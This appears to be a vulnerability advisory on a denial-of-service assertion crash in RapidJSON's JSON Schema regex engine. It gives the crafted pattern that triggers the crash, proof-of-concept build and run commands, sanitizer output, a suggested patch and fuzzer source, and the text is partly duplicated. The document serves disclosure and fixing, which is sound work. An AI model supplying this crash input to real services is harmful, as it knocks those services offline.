Summary
RapidJSON's internal regex engine (regex.h) hits an assertion failure in Eval() when processing malformed regular expressions from JSON Schema "pattern" fields. A crafted regex like ^s(}}}|)}}}}}}}}+ causes operand stack underflow, triggering assert(operandStack.GetSize() >= sizeof(Frag) * 2) at regex.h:381. Exploitable when an application validates JSON against untrusted schemas.
Root Cause
GenericRegex::Eval() at regex.h:381 assumes the operand stack has at least 2 Frag entries during alternation (|) processing. The regex compiler does not validate the pattern structure before evaluation. A malformed regex containing nested groups with alternation operators causes the operand stack to underflow, violating the assertion. The compiler accepts syntactically invalid patterns without error, passing them directly to the evaluator.
Vulnerable Code (regex.h:381)
template <typename Encoding, typename Allocator>
bool GenericRegex<Encoding, Allocator>::Eval(
Stack<Allocator>& operandStack, Operator op) {
// ...
case kAlternation: {
// Assumes 2 operands are available on the stack
assert(operandStack.GetSize() >= sizeof(Frag) * 2); // ASSERTION FAILURE
Frag e2 = *operandStack.template Pop<Frag>(1);
Frag e1 = *operandStack.template Pop<Frag>(1);
// ...
}
}
Trigger Pattern
Regex: ^s(}}}|)}}}}}}}}+
The nested group "(}}}|)" with alternation followed by repeated closing braces
causes the operand stack to be consumed faster than populated, resulting in
underflow when the alternation operator is evaluated.
Vulnerability Description
RapidJSON's internal regex engine, used for JSON Schema "pattern" validation, does not properly validate regular expression syntax before evaluating the pattern. The Eval() function in GenericRegex processes operators assuming the operand stack is well-formed, with assert() guards protecting against stack underflow. When a malformed regex such as ^s(}}}|)}}}}}}}}+ is provided via a JSON Schema "pattern" field, the operand stack underflows during alternation processing, triggering the assertion at regex.h:381. This is exploitable in any application that validates JSON documents against untrusted or user-provided JSON Schemas. In web services accepting JSON Schema definitions, this becomes a network-exploitable denial of service (the attacker supplies a malicious schema, and any subsequent validation against it crashes the service).
Severity
Medium (CVSS 5.5)
PoC
Production Reproduction
Production application: workspace/prod_repro/json_schema_validator.cpp - JSON Schema validation service using rapidjson::SchemaDocument, rapidjson::SchemaValidator public API.
# Build
clang++ -fsanitize=address -g -O1 -I/path/to/rapidjson/include \
workspace/prod_repro/json_schema_validator.cpp -o json_schema_validator
# Run with crash input
ASAN_OPTIONS=detect_leaks=0 ./json_schema_validator crash-2d2aae10f939c969030c33c3289f2c4188642165
Standalone Reproduction
Also reproducible with standalone JSON files:
Schema (schema.json):
{"pattern":"^s(}}}|)}}}}}}}}+"}
Document (doc.json):
ASAN_OPTIONS=detect_leaks=0 ./json_schema_validator schema.json doc.json
Sanitizer Output
Note: This is an assert() failure, not a memory error. The program calls abort() directly, so ASAN does not produce a stack trace — the assertion message and Aborted exit status is the complete output.
json_schema_validator: /usr/include/rapidjson/internal/regex.h:381: bool rapidjson::internal::GenericRegex<rapidjson::UTF8<>>::Eval(Stack<Allocator> &, Operator) [Encoding = rapidjson::UTF8<>, Allocator = rapidjson::CrtAllocator]: Assertion `operandStack.GetSize() >= sizeof(Frag) * 2' failed.
Aborted (exit code 134)
Suggested Fix
--- a/include/rapidjson/internal/regex.h
+++ b/include/rapidjson/internal/regex.h
@@ -378,7 +378,8 @@ bool GenericRegex<Encoding, Allocator>::Eval(
case kAlternation: {
- RAPIDJSON_ASSERT(operandStack.GetSize() >= sizeof(Frag) * 2);
+ if (operandStack.GetSize() < sizeof(Frag) * 2)
+ return false; // Reject malformed regex instead of asserting
Frag e2 = *operandStack.template Pop<Frag>(1);
Fuzzer Source Code
// rj_schema_fuzzer.cc — Fuzz rapidjson SchemaValidator
#include <cstdint>
#include <cstddef>
#include <string>
#include <rapidjson/document.h>
#include <rapidjson/schema.h>
#include <rapidjson/stringbuffer.h>
#include <rapidjson/error/en.h>
extern "C" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) {
if (size < 4) return 0;
size_t split = size / 2;
const std::string schema_str(reinterpret_cast<const char*>(data), split);
const std::string doc_str(reinterpret_cast<const char*>(data + split), size - split);
rapidjson::Document schema_doc;
if (schema_doc.Parse(schema_str.c_str()).HasParseError()) return 0;
if (!schema_doc.IsObject()) return 0;
rapidjson::SchemaDocument schema(schema_doc);
rapidjson::Document doc;
if (doc.Parse(doc_str.c_str()).HasParseError()) return 0;
rapidjson::SchemaValidator validator(schema);
if (!doc.Accept(validator)) {
rapidjson::StringBuffer sb;
validator.GetInvalidSchemaPointer().StringifyUriFragment(sb);
(void)sb.GetString();
sb.Clear();
(void)validator.GetInvalidSchemaKeyword();
validator.GetInvalidDocumentPointer().StringifyUriFragment(sb);
(void)sb.GetString();
}
validator.Reset();
doc.Accept(validator);
return 0;
}
Summary
RapidJSON's internal regex engine (regex.h) hits an assertion failure in
Eval()when processing malformed regular expressions from JSON Schema "pattern" fields. A crafted regex like^s(}}}|)}}}}}}}}+causes operand stack underflow, triggeringassert(operandStack.GetSize() >= sizeof(Frag) * 2)at regex.h:381. Exploitable when an application validates JSON against untrusted schemas.Root Cause
GenericRegex::Eval()at regex.h:381 assumes the operand stack has at least 2Fragentries during alternation (|) processing. The regex compiler does not validate the pattern structure before evaluation. A malformed regex containing nested groups with alternation operators causes the operand stack to underflow, violating the assertion. The compiler accepts syntactically invalid patterns without error, passing them directly to the evaluator.Vulnerable Code (regex.h:381)
Trigger Pattern
Vulnerability Description
RapidJSON's internal regex engine, used for JSON Schema "pattern" validation, does not properly validate regular expression syntax before evaluating the pattern. The
Eval()function inGenericRegexprocesses operators assuming the operand stack is well-formed, withassert()guards protecting against stack underflow. When a malformed regex such as^s(}}}|)}}}}}}}}+is provided via a JSON Schema "pattern" field, the operand stack underflows during alternation processing, triggering the assertion at regex.h:381. This is exploitable in any application that validates JSON documents against untrusted or user-provided JSON Schemas. In web services accepting JSON Schema definitions, this becomes a network-exploitable denial of service (the attacker supplies a malicious schema, and any subsequent validation against it crashes the service).Severity
Medium (CVSS 5.5)
PoC
Production Reproduction
Production application:
workspace/prod_repro/json_schema_validator.cpp- JSON Schema validation service usingrapidjson::SchemaDocument,rapidjson::SchemaValidatorpublic API.Standalone Reproduction
Also reproducible with standalone JSON files:
Schema (
schema.json):{"pattern":"^s(}}}|)}}}}}}}}+"}Document (
doc.json):"hello"Sanitizer Output
Note: This is an
assert()failure, not a memory error. The program callsabort()directly, so ASAN does not produce a stack trace — the assertion message andAbortedexit status is the complete output.Suggested Fix
Fuzzer Source Code